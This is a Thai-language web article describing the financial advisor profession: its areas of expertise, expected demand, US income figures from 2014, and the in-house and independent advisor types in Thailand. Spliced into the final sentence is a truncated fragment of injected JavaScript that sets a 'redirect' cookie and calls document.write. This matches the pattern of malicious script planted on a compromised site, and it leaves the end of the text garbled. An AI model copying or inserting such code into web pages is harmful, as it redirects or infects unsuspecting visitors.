ที่ปรึกษาทางการเงิน (Financial Advisor)

By : Pattarakorn Vorathanuch


อยากสุขภาพดี ต้องมีโค้ชหรือเทรนเนอร์เป็นที่ปรึกษา ถ้าอยากมีสถานะการเงินที่ดี ก็ต้องมีที่ปรึกษาด้วยเช่นกัน แต่ที่ปรึกษาที่จะกล่าวนี้ คือ ที่ปรึกษาทางการเงิน หรือที่เรียกว่า Financial Advisor

หน่วยงานภาครัฐหรือองค์กรในยุคนี้ได้ให้ความสำคัญในเรื่องนี้มาก ไม่เว้นแม้แต่ผู้ประกอบการธุรกิจ นักลงทุน หรือผู้จดทะเบียนในนามบุคคลที่ประกอบอาชีพที่มีรายได้สูง ล้วนแต่เล็งเห็นถึงบทบาทสำคัญ เพราะนอกจากจะช่วยให้ความรู้ความเข้าใจในด้านการเงินและการลงทุนแล้ว ที่ปรึกษาทางการเงิน ยังมีสายงานสาขาที่เป็นประโยชน์ในส่วนประกอบอื่นๆ อีกมากมาย เช่น การบริหารการเงิน การบริหารสินทรัพย์ การบริหารความเสี่ยง การวางแผนภาษี การวางแผนเพื่อการเกษียณ การวางแผนจัดการมรดก ซึ่งต้องอาศัยองค์ความรู้ทางด้านภาษีการประกันภัย การลงทุน กฎหมาย การวิเคราะห์ทางการเงิน การบริหารจัดการหนี้ การวางแผนเพื่อการเกษียณเพื่อการออม สภาวะทางเศรษฐกิจ สิทธิประโยชน์ที่จะได้รับจากรัฐ และความรู้เกี่ยวกับการเงินเชิงพฤติกรรม ซึ่งทั้งหมดที่ได้กล่าวมานี้ ล้วนไม่ใช่เรื่องง่าย ดังนั้นผู้ที่ทำอาชีพนี้จำเป็นต้องมีองค์ความรู้ พร้อมทั้งความสามารถในการวิเคราะห์และสังเคราะห์ข้อมูล เพื่อให้เกิดผลประโยชน์ทางการเงินสูงสุดแก่ลูกค้า

ปัจจุบันมีหน่วยงานองค์กรและสถาบันต่าง ๆ ที่เปิดให้บริการเป็นหลักสูตรเชิงวิชาการ รวมทั้งมีการฝึกอบรม ให้ความรู้ จนขยับขยายและกลายเป็นที่ยอมรับอย่างแพร่หลาย และจากข้อมูลเชิงวิเคราะห์ในปี พ.ศ.2023 ได้คาดการณ์ว่า อาชีพนี้จะเป็นที่ต้องการมากของตลาดโลก เนื่องจากคนรุ่น Baby Boomers มีจำนวนเพิ่มมากขึ้น ซึ่งอาจส่งผลทำให้การวางแผนด้านสุขภาพทางการเงินจะได้รับความสนใจเป็นพิเศษ

จากผลสำรวจค่าเฉลี่ยรายได้ต่อปีของอาชีพที่ปรึกษาทางการเงินในต่างประเทศ ในปี ค.ศ. 2014 ปรากฏว่าสหรัฐอเมริกาอยู่ที่ 5 หมื่นดอลลาร์สหรัฐต่อปี หรือประมาณ 1.6 ล้านบาท ในขณะที่ที่ปรึกษาทางการเงินอาวุโสทำรายได้ถึง 120,000 ดอลลาร์สหรัฐ หรือประมาณ 4 ล้านบาท

ขณะที่กระแสและสถานการณ์ของอาชีพที่ปรึกษาทางการเงินประเทศไทย (Financial Advisor) ในตอนนี้พบว่ามีอัตราการเติบโตเพิ่มขึ้นโดยรวมในปัจจุบัน สามารถแยกประเภทหลักของผู้ที่ทำอาชีพนี้ได้เป็น 2 ประเภท คือ

ประเภทที่ 1. อาชีพที่ปรึกษาการเงินในองค์กร สถาบันการเงิน บริษัทขนาดใหญ่ ซึ่งรวมถึง ธนาคาร บริษัทตลาดหลักทรัพย์ หรือบริษัทหลักทรัพย์จัดการกองทุน

ประเภทที่ 2. อาชีพที่ปรึกษาการเงินอิสระ (Independent Financial Advisor: IFA) ประเภทนี้ส่วนใหญ่เติบโตมาจากสายงานขาย โดยเฉพาะสาย “ตัวแทนประกันชีวิต” โดยเริ่มมีการพัฒนาความสามารถตนเองในด้านต่างๆ

ถึงอย่างไรก็ดี อาชีพที่ปรึกษาทางการเงินในประเทศไทย น่าจะเป็นอาชีพที่สามารถเติบโตและพัฒนาไปได้อีกไกลมาก โดยเฉพาะอย่างยิ่ง ในอนาคตที่กำลังจะถึงนี้ ภาวการณ์เปลี่ยนแปลงทางการเงิน ทั้งจากการเมือง การปกครอง และผลกระทบจากประเทศมหาอำนาจต่างๆ ที่อาจส่งผลทำให้ทุกองค์กรมีความจำเป็นต้องใช้บริการ เป็นเสมือนปัจจัยหลักอย่างหนึ่ง หรือเป็นมาตรฐานหลักอย่างหนึ่งที่ขาดไม่ได้ if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

 

Reviews

Comment as: